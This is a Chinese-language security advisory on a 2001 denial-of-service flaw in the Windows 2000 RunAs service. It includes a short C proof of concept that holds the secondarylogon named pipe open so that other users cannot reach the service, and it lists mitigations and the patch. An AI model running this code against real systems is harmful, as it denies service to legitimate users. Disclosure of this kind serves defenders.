Microsoft Windows 2000 RunAs 拒绝服务漏洞
发布日期:2001-11-12
更新日期:2001-11-13
受影响系统:
Microsoft Windows 2000 SP2
Microsoft Windows 2000 SP1
Microsoft Windows 2000
描述:
BUGTRAQ ID: 3191
Windows 2000 的RunAs服务允许一个用户以其它用户的身份执行命令,该服务存在一个
安全问题,可能导致拒绝服务。
当RunAs服务被调用时,会与指定的服务器创建一个命名管道会话用于进行认证,由于
RunAs服务在同一时刻只允许建立一个会话,如果一个用户创建了一个这样的会话却不
请求任何服务,那么其它的客户端将无法使用该服务。
<*来源:Camisade - Team RADIX (
research@camisade.com)
参考:
http://www.camisade.com/research/reports/radix1112200103.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
// radix1112200103.c - Camisade - Team RADIX - 11-12-2001
//
// Camisade (www.camisade.com) is not responsible for the use or
// misuse of this proof of concept source code.
#define WIN32_LEAN_AND_MEAN
#define UNICODE
#define _UNICODE
#include <windows.h>
#include <tchar.h>
#include <stdio.h>
#include <conio.h>
#define SECLOGON_PIPE _T("\\\\.\\pipe\\secondarylogon")
void main()
{
HANDLE hPipe;
hPipe = CreateFile(SECLOGON_PIPE, GENERIC_READ|GENERIC_WRITE, 0, 0, OPEN_EXISTING, 0, 0);
if (hPipe == INVALID_HANDLE_VALUE)
{
printf("Unable to open pipe, error %d\n", GetLastError());
return;
}
printf("Connected to pipe. Press any key to disconnect.\n");
getche();
CloseHandle(hPipe);
}
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 暂时停止使用或者删除RunAs服务
厂商补丁:
该漏洞的补丁将包含在Service Pack 3中,我们建议使用此软件的用户随时关注厂商的
主页以获取该补丁:
http://www.microsoft.com/浏览次数:3606
严重程度:0(网友投票)